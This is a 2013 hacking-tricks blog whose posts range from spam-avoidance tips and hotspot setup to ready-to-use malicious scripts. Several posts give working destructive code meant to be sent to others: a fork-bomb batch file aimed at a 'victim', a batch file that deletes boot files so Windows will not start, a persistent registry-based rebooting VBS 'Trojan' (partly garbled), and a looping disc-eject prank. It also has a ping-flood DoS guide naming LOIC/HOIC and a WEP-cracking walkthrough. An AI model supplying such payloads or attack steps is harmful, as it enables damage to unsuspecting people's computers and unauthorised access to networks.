Friday 31 May 2013

Create a Funny Virus

Create a Funny Virus that continuously EJECT CD/DVD drives:

Step 1: Open Notepad and copy the below given code in it

Set oWMP = CreateObject("W­MPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Step 2: Save it as eject.vbs in any location

► You can use any name but it should have .vbs extension.

► Make sure that the "All Files" option is selected in the "Save as type" is drop-down list.

Step 3: Open your saved file.

→ It will continuously eject all your connected Optical drives!!!

→ If you put them back in, it will pop them out again. 

To stop this program,

→ End the wscript.exe process in the Task Manager.
Or
→ Restart your computer.

Send this file to your friends as an email attachment and have fun 

DO NOT WORRY... IT IS COMPLETELY HARMLESS!!!

Remove Autorun.inf Virus from Pendrive Easily

How to Remove Autorun.inf Virus
from Pendrive Easily – Without
Antivirus!
I have heard many peoples
suffering from autorun.inf virus
that is the major problem of the
windows xp users
Anyway, As we know Our
Antivirus (Basically, Avira, Avast,
AVG, etc), Only detects Virus i.e
autorun.inf whenever you insert
your removable disk (Pen Drives).
But our AntiVirus can’t disinfect it
nor delete it.
Hmm, the autorun.inf is hidden
and it can’t be remove or
disinfected by Anti virus.
I have a Funny tutorial for you all
through which you all can get Rid
from this Virus without any
Antivirus:

1. Open Notepad
2. Do not write anything in it.
3. Save as (any where in PC i.e
Desktop) with name “autorun.inf”
4. Copy and paste in your “Pen
Drives”
5. Remove your drive then insert
again, it will open normally

Thursday 30 May 2013

UsE AnY Trial SoFtWaRe For FoReVeR

Use any software in trial forever

Description

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.
You can run multiple applications simultaneously,­each application works with different date and time, while the real date/time of your system continues to run normally.

How does it work ?

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime,­GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.
System Requirements

RunAsDate works under Windows 2000, Windows XP, Windows Server 2003, Windows Server 2008, Windows Vista, Windows 7, and Windows 8. Older versions of Windows are not supported. The is also x64 version available in a separated download, for using with x64 applications.

Download link 32 >  http://­www.nirsoft.net/utils/­runasdate.zip

Download link 64 > http://­www.nirsoft.net/utils/­runasdate-x64.zip

Unlock an Android Phone Pattern

How To Unlock an Android
Pattern:
Today many android phone user
use the inbuilt unlock pattern for
security of there smartphones....

This is very easy to use but some
times after many wrong attempts
the phone locks permanently...

After that you need to enter the
user id you enter in the google
play store to unlock phone but there are some problems to unlock it again
if u stop data usage.. so it is not
connected to the internet and
then
you cannot unlock the phone
without this trick. Sometime user
needs to go to Samsung care
center
and then give some money to
unlock it again so this is costly
you
need to pay here we are going to
give you the steps to unlock your
phone.
Just follow these simple steps to
unlock your phone and use again
free of cost.

> Enter the user email id you enter
in the play store.
>>If you don’t know the email id.
Then just don’t worry just follow
these steps.
>>> Switch off your android and
then wait for a while to switch it
back on.
>>> Then first click Up Volume Key
and hold it.
then click on Home button and
hold
it.
>>> Then press the power button
and after is started just release it.
>>> Then you can view the secret
android menu you never have
seen
before....
>>> Just click on home button for
up and down in the menu...
>>> Then just go to third option
named as DELETE ALL USER DATA.
then it takes some time.
>>> The phone will restart and
the
unlock patter problem is fixed.
but the main problem is resetting
the phone.... But it is the one and
only trick to regain access to your
phone.

CREATE LOGIC BOMB VIRUS

HOW TO CREATE LOGIC BOMB
VIRUS

Its Just too easy to create,
just follow the below steps.
1. Open Notepad on your PC and
write this Code into it.
%0|%0 or copy it from here to
your Notepad

2. Then save it with a .bat
extension! When saving delete
the .txt and input the File name
and the .bat extension e.g
logic.bat

3. Once anyone will do double
click on this bat file, his system
will Jam and Crash.

NOTE:
Now you can send it to your
Victim through Mail or from your
Flash Drive to his PC and then
once he open the File, the action
will start.
SOLUTION OR PREVENTION
MEASURE TO TAKE
Due to members comments
asking for Solution and the Way
to Prevent this Attack, We have
listed this 2 Reliable Ways to
conquer it.
not open any File with .bat on
your PC.
If you are already a victim of this
Virus, Once you ON your PC,
quickly Press ctrl + alt + delete
key on your keyboard then Start
the Task Manager, Now click on
the Processes Tab and locate
Fork.bat or anyname you Use,
then put you mouse on it and
click on the End Process Button,
thats all.

NOTE:THIS TUTORIAL IS FOR
EDUCATIONAL PURPOSE ONLY.

Play High Graphics Game in Lower graphics PC

How to play high graphics game one lower graphics

Hi guys, Today's most top
games require quite high
hardware requirements in
order to run.So most of you
cannot play these games unless
you have a very powerful
PC.Games like Gta IV,Call of duty-
Black Ops,Fifa 2012,Gear of War 2,prince of
persia -the forgotten sands,etc..
require high memory,good
processor and a dedicated
latest graphics card.

In this post I an going to share a
software called SWIFTSHADER
which is a graphic card
emulator.This software enable
you to run latest games on your
computer,which otherwise
cannot be played due to
hardware limitations of your
computer.

WHAT THIS EMULATOR DO?

Emulator decreases the quality
of the game so that you can run
games on better fps.
HOW TO USE:
Download the file
given below in the
link.This file is a rar
file so unrar it and
you will find two
folders namely *32
and *64.
Depending upon
your window
(either 32 bit or 64
bit),copy the files in
folder d3d9.dll and
swiftshader.iniand
paste in the game
directory.Game
directory is the
folder in program
files where you have
been installed the
game.
After copying the
two files in game
directory,run the
game .Your game
should run
smoothly.

NOTE:
On 2gb ram it can
run about 14-20fps.
On 1gb ram it can
run about 4-8fps .
If you want to run
more better on 1gb
or 2gb so reduce
the graphics and
resolution in game.
It can run Shader
Model 3.0 Graphics
Game.

Click here for Download

Enjoy!!!!!

Protect E-mail from Spam

The following methods can be used to combat email spam. 

1. Use spam filters for your email account. If you‘re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each Spam filter has it‘s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

  2. Do not post your email address in public forums, user comments and chatrooms. Give your email address only to trustworthy websites while signing up for newsletters. 

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead signup for a dummy email account and use this for surveys and feedback forms.

  4. While posting your contact email address on your website use this format: emailaddress [at] mysite.com instead of emailaddress@mysite.com. This protects your email address from being indexed by spam bots

Security Tips By World's Most Wanted Hacker Kevin Mitnick|

Security Tips By World's Most Wanted Hacker Kevin Mitnick
--------------------------------------------

Kevin Mitnick came by his security expertise the hard way. In the 1990s, his electronic penetration of some of the biggest companies in the world made him a notorious tech boogieman, and ultimately landed him five years in prison.

Now free and clear, Mitnick has reinvented himself as a computer security consultant and writer. He travels the world teaching organizations how to secure their information in a world of corporate spies and younger versions of himself. He took a break from his jet-setting to share some practical security tips. Clip them and stick them on your parents' refrigerator or your IT administrator'swhite board.

Here is Top 10 list of steps you should take to protect your information and your computing resources from the bad boys and girls of cyberspace:

• Back up everything! You are not invulnerable. Catastrophic data loss can happen to you -- one worm or Trojan is all it takes.

• Choose passwords that are reasonably hard to guess -- don't just append a few numbers to a no-brainer. Always change default passwords.

• Use an antivirus product like AVG or Norton, and set it to update daily.

• Update your OS religiously and be vigilant in applying all security patches released by the software manufacturer.

• Avoid hacker-bait apps like Internet Explorer and disable automatic scripting on your e-mail client.

• Use encryption software like PGP (pretty good privacy) when sending sensitive e-mail. You can also use it to protect your entire hard drive.

• Install a spyware detection app -- or even several. Programs that can be set to run frequently, like SpyCop, are ideal.

• Use a personal firewall. Configure it to prevent other computers, networks and sites from connecting to you, and specify which programs are allowed to connect to the net automatically.

• Disable any system services you're not using, especially apps that could give others remote access to your computer (like Remote Desktop, RealVNC and NetBIOS).

• Secure your wireless networks. At home, enable WPA (Wi-Fi protected access) with a password of at least 20 characters. Configure your laptop to connect in Infrastructure mode only, and don't add networks unless they use WPA.

Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.

Tuesday 28 May 2013

Shutdown a window forever !!!

Warning Use it at ur own risk em nt responsible

Shutdown a window forever !!!

copy the code in notepad and save it as cool.bat

@echo off
attrib -r -s -h c:\autoexec.bat­
del c:\autoexec.bat­
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Send it to someone and his window will not boot again !!!

NOTE - this tutorial is for educational purposes only,
nd don't try open this file on ur PC

Make broadband Net Faster

How to make your limited
broadband faster
well,using broadband sometimes
slow,so today i gonna show you
some trick

1)first of all,we need to do is run
cmd (must connect to internet)

2)next,type in “ipconfig/all” and
hit
enter

3)once you do that,connection­list
will come out.search for your
modem name (broadband name)

4)ok,type in “ping [ip address] -t”
Example: ping 10.175.53.131 -
t .and hit enter.

5)let cmd like that.close it,if you
don't want to use.

Simple virus that eject your cd-drive

Create a Harmless Funny Virus
with Notepad

-Continuously eject CD/DVD drives This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it inNotepad as Virus.vbs or *.vbs.:

Set oWMP = CreateObject("W­MPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count- 1
colCDROMs.Item(i).Eject
NextEnd If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.Reboot ur computer or wnd task from task manager to stop it...Be careful.

Student Life

Monday 27 May 2013

DoS Attack on Website

Hey guyz...  I am going to show you a very SIMPLE DoS Attack.

First of all... What is a DoS attack?

DoS stands for Denial of Service. It is a attack were a hacker attempts to interrupt service to a computer, website or a server.

How to launch a DoS??

1- Open up CMD (Command prompt)
2- Type in ping *name of website* -t -l 13500
3- Leave this for a while and after a few hours the website should be down...

How does this attack work??

You are telling your computer to send a ''ping request'' to a website and the ''-t'' tells your computer to keep sending this request. Soon the website will not be able to handle so many requests and should crash. The "-l 13500'' is telling your computer what size the ping request is, you can play around with this number and see what works the most.

DoS tools/programs for DoS attacks...

1- LOIC (Low Orbit Ion Cannon) This is a powerful DoS tool and is very easy to use. Download from Google..

2- HOIC (High Orbit Ion Cannon) This is also another easy to use tool for DoS attacks. Download from Google..

Enjoy guyzz...

Please note__ this is a VERY SIMPLE and basic attack and will only work on small websites. Unless you are using LOIC and HOIC programs.

NOTE - this tutorial is for educational purposes only.

Create Your Own Home Wi-fi Network Without a Router

Easily Create Your Own Home
Wi-fi
Network Without a Router :
~ Engineering Buddies
If you are using Windows 7 or
8, you can easily setup your own
home
Wi-Fi Network without a
router, and
share your internet to your
other multiple devices such as your
smartphone, tablet or your
another
computer.
Below are simple steps using
which you can create your own Wi-Fi
Network:
1) You should have Windows 7
or 8
installed on your computer. It
should have internet connection to
be shared over Wi-Fi network.
2) Most of today's computer
come
already enabled with Wi-Fi
capabilities (wireless network card).
So if you computer is not too
old,
it must have already equipped
with
built-in Wi Fi. If your computer is
too old, you can also buy a USB
network adapter.
3) Finally, download and install
a
simple, free utility called Virtual
Router. After installation,
open the
Virtual Router. You can choose
your
own network name and password to
connect. You can also select the
connection you want to share
over
Wi-Fi. Click “Start Virtual
Router” and you are done! You can
now
easily find and connect to your
Wi-
Fi network using your phone,
tablet or another computer.

How to make Trojan virus

This is Educational Purpose...

For them who want all data damaged. There cra ni Virus with notepad easy to make.

* note the following copy all the source into notepad save as. vbs (if you want to activate)
if not let it remain in the file exstensi.txt
exampels: ippamd0_trojanHorse.VBS

Copy all the source below:
brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem ()

setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" & vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function

rebootSystem function ()
strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function

yes ... do not forget saved?
nd don't try open this file on ur PC

Crack Wi-Fi password easily

How to Crack a wifi for
begginners:-
Things u need
A compatible wireless adapter:
This is by far the biggest
requirement.The wireless card of
your computer has to be
compatible with the software
CommVIew. This ensures that the
wireless card can go into
monitor mode which is essential
for capturing packets.Click here
to check if your wireless card is
compatible
CommView for Wi-Fi :
This software will be used to
capture the packets from the
desired network adapter.Click
here and download the software
from the website.
Aircrack-ng GUI:
After capturing the packets this
software does the actual
cracking.Click here-Click here and
download the software from the
website.
A little patience is vital!!
Download the zip file of
CommView for Wi-Fi from the
website. Extract the file and run
setup.exe to install CommView
for Wi-Fi. When CommView
opens for the first time it has a
driver installation guide. Follow
the prompts to install the driver
for your wireless card.
Run CommView for Wi-Fi.
Click the play icon on the top left
of the application window.
Start scanning for wireless
networks.
CommView now starts scanning
for wireless networks channel by
channel. After a few minutes you
will have a long list of wireless
networks with their security type
and signal. Now it is time to
choose your target network
A few things to keep in mind
before choosing the target
wireless network
This tutorial is only for WEP
encrypted networks.
So make sure you select a
network with WEP next to its
name
Choose a network with the
highest signal.
Each network will have its details
in the right column.
Make sure the WEP network you
are choosing has the least the
least dB (decibel) value.
Once you have chosen your
target network,select it and click
Capture to start capturing
packets from the desired
channel.
Now you might notice that
packets are being captured from
all the networks in the particular
channel. To capture packets only
from the desired network follow
the given steps.
Right click the desired network
and click on copy MAC Address.
Switch to the Rules tab on the
top.
On the left hand side choose MAC
Addresses
Enable MAC Address rules
For 'Action' select 'capture' and
for 'Add record' select 'both'.
Now paste the mac address
copied earlier in the box below.
We need to capture only data
packets for cracking. Hence select
D on the bar at the top of the
window and deselect M
(Management packets) and C
(Control packets).
Now you have to save the
packets so that they can be
cracked later. To do this-
Go to the logging tab on top and
enable auto saving.
Set Maximum Directory Size to
2000
Set Average Log File Size to 20.
Now the boring part- WAITING!
NOTE: The amount of time taken
to capture enough data packets
depends on the signal and the
networks usage. The minimum
number of packets you should
capture should be 100,000 for a
decent signal.
After you think you have enough
packets (at least 100,000
packets)
Go to the log tab and click on
concatenate logs.
Select all the logs that have been
saved.
Do not close CommView for Wi-Fi
Now navigate to the folder
where the concatenated logs
have been saved
Open the log file
Select File- Export -Wire shark
tcpdump format and choose any
suitable destination.
This will save the logs with a .cap
extension to that location
Download Aircrack-ng and
extract the zip file.
Open the folder and navigate to
'bin'.
Run Aircrack-ng GUI
Choose WEP
Open your .cap file that you had
saved earlier.
Click Launch.
In the command prompt type in
the index number of your target
wireless network.
Wait for a while .If everything
goes fine the wireless key will be
shown.
You may also receive a request to
try with more packets. In this
case wait until more packets
have been captured and repeat
the steps to be performed after
capturing packets
BEST OF LUCK
Enjoy!!!